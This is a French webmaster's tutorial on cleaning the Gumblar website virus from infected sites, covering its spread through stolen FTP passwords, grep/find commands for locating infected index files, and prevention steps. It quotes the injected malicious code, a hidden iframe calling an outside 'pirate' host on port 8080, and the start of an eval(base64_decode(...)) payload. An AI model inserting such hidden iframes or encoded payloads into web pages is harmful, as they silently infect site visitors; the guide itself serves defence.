Header Graphic
 

 Accueil - Techniques > Les virus de site > Eliminer le Virus gumblar

   Imprimer la page   |     Ajouter aux favoris

Gumblar
Virus de site

  
Date :
Auteur : Christian Perpezat

  Gumblar, une menace pour les sites internet. Plus de 3000 sites infectés vers Mai 2009. 

 Je connaissais les virus qui s'attaquent aux PC, mais je n'imaginais pas les virus web . Jusqu'au jour ou en me connectant à mon site ebook-success.com j'arrive sur cette page

gumblar

  Ca fait drôle !!!
  J'ai fait ci-dessous une petite présentation du processus, comment se protéger
  
  Nouveau : Janvier 2010 la solution existe -> voir en bas de cette page
 
 
Gumblar
La contamination

  
  J'ai bataillé dur pour venir à bout de gumblar, et j'ai tellement effectué de commandes et d'opérations que je ne vais pas tout me rappeller, sinon l'essentiel .

  • Comment on l'attrape ? Simplement en visitant un site infecté
  • Comment il se propage ? Un petit shéma :

propagation

  1. Visite d'un site infecté, le virus s'introduit dans le PC
  2. Le virus détecte un logiciel de transfert FTP
  3. Il trouve les codes d'accès aux sites du webmaster
  4. Il va déposer son code malicieux en particulier dans les fichiers index.htm ou index.php

  Comment éviter d'être contaminé ?

  • en ayant un anti-virus à jour sur son PC
  • en évitant d'enregistrer son mot de passe FTP, hé oui, le retapper chaque fois !

  J'avoue que jusque là, je n'étais pas très prudent et un peu flemmard. Le PC toujours sous tension et Filezilla connecté en permanence à mes sites. J'ai appris depuis que Filezilla gardait les mots de passe en clair dans un fichier de l'ordinateur. Il y a eu deux nouvelles version de Filezilla depuis, il ont du faire le nécessaire.

  Je préfèrais chasser le virus de temps en temps sur mon PC que d'acheter un anti-virus. Et puis savoir éliminer un virus d'un PC me semblait utile ( pour un informaticien ) 

 
 
Publicité

 
Gumblar
Son action sur un site

  
  Gumblar s'attaque aux fichiers principaux des sites, à savoir les fichiers index, quel que soit leur extension, donc index.htm, index.html ou index.php. Je l'ai trouvé aussi dans des fichiers main.php ou maintenance.php . Il insère dans chaqu'un de ces fichiers une ligne de code qui ressemble à ceci :

<iframe src="http://toto.ru:8080/index.php" width=100 height=150 style="visibility: hidden"></iframe>

  En gros c'est un appel caché vers un site "pirate" . Une iframe est une fenètre.

  Pour les fichiers index.php, la ligne iframe se trouvait en fin de fichier, après la balise ?>
et pour les fichiers index.html elle était souvent insérée dans la même ligne que " body"

  Heureusement pour moi, mes sites étaient très peu opérationnels, peu connus et surtout utilisés uniquement pour me former au métier de web-marketeur. J'ai eu pas moins de 300 fichiers infectés. Il faut savoir qu'une des méthodes recommandée pour protéger les répertoires d'un site est d'y placer un fichier index vide ...

  Sur mon hébergement 1and1, j'ai du réparer manuellement tous les fichiers infectés, par contre je n'ai pu le faire chez ovh, mes fichiers index ayant été partiellement effacés.
  C'était une boucle infernale,  tant que tout n'a pas été clean, le virus repartait vers mon PC qui le renvoyait sur mes sites. 
  
 
Gumblar
La méthode

  
  A moins d'avoir une sauvegarde complète de l'ensemble des fichiers contenus sur son serveur, et demander à son hébergeur une restauration complète, il faut s'attaquer au problème manuellement. Je n'ai pas trouvé d'information suffisante sur le net pour éradiquer complètement ce virus.

   Les deux solutions possibles que je connaisse :

  1. Downloader la totalité de son serveur sur son PC et utiliser des outils windows
  2. Se connecter directement sur son serveur et utiliser des commandes Unix

  Ayant été administrateur système pendant 15 ans, c'est cette 2ème méthode que j'ai utilisé. Je suppose  que ceux qui sont sous linux peuvent s'en inspirer. La puissance d'Unix par rapport aux outils windows ou DOS, se passe de commentaires.

  Le principe est le même dans les 2 cas :

  • trouver tous les fichiers modifiés récemment
  • trouver ceux qui contiennent à tort le mot iframe
  • corriger et sauvegarder

   
 
Gumblar
Les systèmes de fichiers

  

Prenons un exemple avec un fichier index.html

 Sous windows :
      Nom                Taille                Type                 Date de modification          Attributs
     index.html           10 Ko            Fichier html                 01/01/2010                archive

 Le même sous unix :

  -rw-r--r-- 1 u2615444 ftpusers 10988 Jan  1 16:33 index.html

 en clair, c'est un fichier, ses droits sont en 644, son propriétaire est u2615444, son groupe est ftpusers, sa taille est de 10988 octets, sa dernière modification est le 1er Janvier 16h33

 
 
Gumblar
L'éliminer directement sur le serveur

  
    Mon but ici n'est pas de faire un cours Unix, mais de lister les commandes qui m'ont permis d'éliminer gumblar de mon serveur. 

  Attention : Unix ne permet pas le droit à l'erreur, il ne pose pas la question "Are you sure", comme le DOS ou Windows, Unix exécute immédiatement.

  Je me connecte par l'intermédiaire de l'émulateur de terminal putty

  Les commandes qui m'ont été le plus utiles:

  • grep iframe * | grep 8080     /* recherche de toute ligne contenant iframe ET 8080
  • find . -type f -name "*" -exec grep iframe '{}' \;

  Cette dernière commande signifie :
cherche | ici | tout fichier | nom quelconque | puis exécute | s'il contient | le mot iframe | 

 Commande puissante, mais dont l'inconvénient est qu'elle ne montre pas quel répertoire contient le fichier. Il faut parfois la recommencer depuis chaque répertoire.

 
 
Gumblar
Résumé

 

  A faire, sachant qu'un seul oubli peut conduire à tout recommencer :

  1. Nettoyer complètement le PC, anti-virus à jour, Kasperski semble suffisant
  2. Mettre à jour Adobe Acrobat Reader et Adobe Flash Player 
  3. Supprimer le logiciel FTP et toutes les traces de son installation
  4. Ré-installer ce logiciel FTP et ne JAMAIS enregistrer le mot de passe
  5. Ensuite modifier les mots de passe FTP du serveur, depuis un autre PC si possible 
  6. Corriger les fichiers index et autres fichiers infectés
  7. Sauvegarder le site
  8. Prier, je plaisante :-)

  Cette méthode n'a pas la prétention d'être exhaustive, elle n'est valable que dans le cas d'infection par le code malicieux "iframe" , il existe également des fichiers infectés ou l'on trouve ce code  : eval(base64_decode('aWYoZn

  Autres constatations :

  • j'ai du refaire plusieurs fois ces manips, car le virus est revenu au moins 3 fois
  • les fichiers index passés en lecture seule (chmod 444) n'ont plus été infectés
  • Kasperski empêche le PC d'être de nouveau contaminé (pub gratuite)
  • il semble qu'Avast soit efficace, mais je ne l'ai pas testé
 

   Back to top     |     
Accueil - Techniques
 Prestations internet
Créer un site
 Structure de page
 Logiciels
 Les CMS
 Editeurs
 Scripts boutique
 Référencer un site
 Les sous domaines
Les virus de site
 Eliminer le Virus gumblar
 Gumblar attaque Wordpress
Hébergement Linux
 Racine d'un site
Hébergement 1and1
 1and1
 Installer un domaine 1and1
 Tuto base SQL 1and1
 Tuto install Wordpress 1and1
 ReadyNet Pro
Google
 Astuces google
 Google Adsense
Divers
 Les forums et le BBcode
 Piwik alternative à Analytics
 Caractères spéciaux
 Binaire et hexadécimal
Contact
Test

 

Annuaire généraliste Européen liens durs rewrite

 

 

Mentions légales Site Map